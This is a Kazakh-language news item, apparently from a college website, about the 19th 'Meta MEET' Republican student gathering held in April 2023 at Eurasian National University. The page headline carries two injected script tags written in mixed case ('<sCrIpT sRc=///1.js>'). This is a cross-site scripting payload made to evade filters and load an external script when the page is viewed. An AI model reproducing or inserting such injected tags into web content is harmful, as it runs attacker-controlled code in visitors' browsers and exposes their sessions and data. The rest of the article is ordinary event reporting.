«Мeta МЕЕТ» ХІХ дәстүрлі Республикалық студенттер шақырылымы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.04.2023
2023 жылдың 19-21 сәуір күндері аралығында Л.Н. Гумилев атындағы Еуразия ұлттық университетінде ҚР Оқу-ағарту министрлігі, «Қазақстан студенттерінің Альянсы» мен Республикалық студенттер қозғалысының ұйымдастыруымен «Мeta МЕЕТ» ХІХ дәстүрлі Республикалық студенттер шақырылымы өтті. Іс-шарада ҚР Оқу-ағарту министрі Бейсембаев Ғани Бектайұлының колледждердің өзін-өзі басқару ұйымдарының көшбасшыларымен кездесуі ұйымдастырылды. Аталмыш шақырылымға Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің тарих пәнінің оқытушысы Нұрқан Медет Өмірбекұлы мен белсенді студент Уайыс Нұртай қатысты. Атамыш іс-шарада студенттердің үздік жобаларын көрсету, жастардың проблемаларын шешу жолдарын ұсыну, интеллектуалдық және спорттық дағдыларын арттыру, жыл бойы белсенді қызмет атқарған жастарды анықтау басты назарға алынды.
Просмотров: 380


Пікір қосу



Деректерді қолтаңбаға қосу